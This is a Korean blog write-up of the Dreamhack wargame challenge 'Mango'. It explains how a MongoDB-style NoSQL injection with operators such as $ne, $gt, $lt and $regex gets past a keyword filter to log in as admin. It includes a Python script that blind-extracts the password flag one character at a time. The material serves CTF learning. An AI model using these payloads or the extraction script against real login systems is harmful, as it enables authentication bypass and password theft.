Dreamhack - 워게임, Mango 풀이

728x90

https://dreamhack.io/wargame/challenges/90/

Mango

Description 이 문제는 데이터베이스에 저장된 플래그를 획득하는 문제입니다. 플래그는 admin 계정의 비밀번호 입니다. 플래그의 형식은 DH{...} 입니다. {'uid': 'admin', 'upw': 'DH{32alphanumeric}'} Reference Serv

dreamhack.io

NOSQL Injection에 관한 문제다.

페이지로 들어가니깐 다짜고짜 /login에서 로그인을 하라고 뜬다.

주소에 복사 붙여넣기를 해보니 guest로 로그인이 됐는지 화면에는 guest만 뜸

만약에 uid 값으로 admin을 주게 되면 페이지에는 filter라고 뜨게 된다.

문제에서 제공하는 서버 파일을 확인해보면 "admin", "admi", "dh"를 키워드를 차단하고 있다. (DH는 플래그의 접두사)

또 아무런 값을 넣으면 undefined가 나옴

이것을 통해 자동화 도구를 이용해 로그인을 하는 것도 가능할 것 같다.

이제 NOSQL Injection을 시도해 보겠다.

방법은 이렇다.

전달하는 파라미터의 이름 ex) uid에 대괄호를 넣어 조건식을 넣어주면 된다. -> uid[$ne]

게다가 이런 조건을 가진 파라미터를 여러 개 전달이 가능함

ex) uid[$ne]=&uid[$gt]=&uid[$lt]

관련 조건식들은 아래 링크에서 참조:

https://book.hacktricks.xyz/pentesting-web/nosql-injection

NoSQL injection - HackTricks

Brute-force login usernames and passwords from POST login

book.hacktricks.xyz

대략

[$ne] : 같지 않을 경우(NOT),

[$regex] : 정규표현식,

[$eq] : 같다(=)

[$lt] : 작다(<)

[$gt] : 크다(>)

가 존재함.

이 조건식을 이용해서 페이지에 admin으로 로그인을 하도록 만들어 보자

guest를 제외한 다른 사용자로 로그인을 하고 싶을 경우엔 [$ne]를 이용해 보면

?uid[$ne]=guest&upw[$ne]=

이런 식으로 파라미터를 전달을 할 수 있다.

하지만

guest를 제외한 사용자가 admin 말고 dreamhack이라는 사용자가 더 존재를 한다는 것

이 [$ne]만으로는 이 문제를 해결하기가 어려움으로 더 다른 조건들을 줘보았다.

바로 찾고자 하는 아이디가 dreamhack에 포함을 하지 않도록 만드는 것.

admin을 그대로 쓰면 filter가 걸리기 때문에 [$gt]에 adm만 대입해주고,

[$lt]에는 dreamhack 혹은 이니셜 d만을 넣어줘 봤다.

그랬더니 짜잔 admin으로 로그인을 하는데 성공

이제 남은 건 패스워드를 알아내는 것.

패스워드는 문제에서도 나와있듯이 DH{로 시작을 한다고 한다.

하지만 마찬가지로 upw에 DH를 넣어주게 되면 또 필터에 걸리게 된다.

해답은 간단하다. 정규표현식을 이용하는 것.

마찬가지로 파라미터에 [$regex]를 넣어 정규표현식 조건을 넣어준다. ex) upw[$regex]

import requests

parameter = None

result = None

words = "0123456789abcdefghijklmnopqrstuvwxyz"

solve = ""
	
for i in range(32):
	

	for ascii in words:
	
		print(i+1,") Try:", ascii )
		
		parameter = "?uid[$gt]=adm&uid[$lt]=d&uid[$ne]=guest&upw[$regex]=[aA-zZ]{2}{" + ( solve + ascii)
		url = "http://host1.dreamhack.games:9785/login" + parameter
		result = requests.get(url).text
		print(parameter)
		print(result)
		if "admin" in result:
			solve += ascii
			print("catch => ", ascii, "|", solve)
			break
			
			
print("Flag:",solve)

그다음 알아서 자동화 도구를 짜줘서 실행

해보니깐 플래그가 잘 나왔다.

728x90

'🏴CTF > DreamHack' 카테고리의 다른 글

DreamHack - login-1 풀이 (0)	2023.03.27
DreamHack - node-serialize (nodejs 직렬화 취약점) 풀이 (0)	2023.03.27
Dreamhack - 워게임, rev-basic-2 풀이 (0)	2021.12.03
Dreamhack - 워게임, rev-basic-1 풀이 (0)	2021.12.01
Dreamhack - 워게임, rev-basic-0 풀이 (0)	2021.11.30

HackLog

Dreamhack - 워게임, Mango 풀이

'🏴CTF > DreamHack' 카테고리의 다른 글

티스토리툴바

Dreamhack - 워게임, Mango 풀이

'🏴CTF > DreamHack' 카테고리의 다른 글

관련글

티스토리툴바